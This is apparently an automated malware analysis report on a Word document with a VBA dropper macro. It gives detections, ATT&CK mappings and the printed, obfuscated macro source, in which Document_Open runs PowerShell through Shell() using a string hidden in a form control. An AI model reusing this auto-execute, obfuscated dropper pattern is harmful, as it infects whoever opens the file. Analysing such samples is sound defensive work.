MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample contains a VBA macro that triggers on document open and utilizes the Shell() function. The macro appears to be designed to execute a PowerShell command, indicated by the concatenation of strings to form the command. This behavior is consistent with a dropper malware designed to download and execute a second-stage payload.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-6826668-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6826668-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2137 bytes |
SHA-256: c896f8d9cbbe980d1490ddb921f8c20729067c44c7f88f69715d4b1aefc71c56 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim QKSMQ93wF(2 To 46) As String
QKSMQ93wF(2) = "uDI4tBL"
Dim qDFcapCu(2 To 46) As String
qDFcapCu(2) = "yQpuDW"
Dim wYaAyhb(153) As Byte
Dim ij97FXZ83() As Byte
Dim CZz4nq(12 To 128) As String
CZz4nq(12) = "DkiVmYTA"
Dim YrSbMwgB
YrSbMwgB = A73k8hW
Dim MXtyNeCO As String
MXtyNeCO = Jkdvl
x
End Sub
Public Sub sh(EqaIK As String, gWP7wHIK As Integer)
Dim csn9YCeR3(6 To 192) As String
csn9YCeR3(6) = "jH2OnS4Q"
Dim JOFjTVq(170) As Byte
Dim vWjdc(224) As Byte
Dim fzFmf As Long
fzFmf = (28800 / 960) * (52)
End Sub
Attribute VB_Name = "E2qjMA"
Sub x()
Dim NuN0Mt6q8(8 To 174) As String
NuN0Mt6q8(8) = "zdzV2yOL"
Dim BXUWxn As Long
BXUWxn = (27380 / 5476) * (5)
Dim nVHaq8() As Byte
Dim PYHbl(10 To 207) As String
PYHbl(10) = "o3dcNbwxV"
Dim E1k5mhYd(10 To 207) As Long
E1k5mhYd(10) = 4700 / 188
Call VBA.Shell("pow" & _
xKhMSRdsV, 0)
Dim I9uxK() As Byte
Dim tWtyPx As String
tWtyPx = ih3bVoSBn
End Sub
Attribute VB_Name = "TtayOv0R"
Public Function E18Wcl(Ujnfl As Integer)
Dim ei6Co(106) As Byte
Dim Ob3fOPN As String
Ob3fOPN = cZwah6j
Dim hXYUNiC8h As Long
hXYUNiC8h = (3106 / 1553) * (63)
Dim UnMmjfo As String
UnMmjfo = ZfnqYmM3d
End Function
Attribute VB_Name = "IvdhNu"
Public Function xKhMSRdsV()
Dim eLDgA As Long
eLDgA = (13720 / 490) * (23)
Dim HoD4HuPM As Object
Set HoD4HuPM = New f
Dim YkN6mL7 As String
YkN6mL7 = HoD4HuPM.de.Text
Dim ZTBYgbG As Long
ZTBYgbG = (711 - 688) * (9)
xKhMSRdsV = YkN6mL7
End Function
Attribute VB_Name = "f"
Attribute VB_Base = "0{C2C76892-B20C-4DAA-913E-91C93963CCD3}{1E3484C0-0827-40C1-BEF7-EB9845AFDBD9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.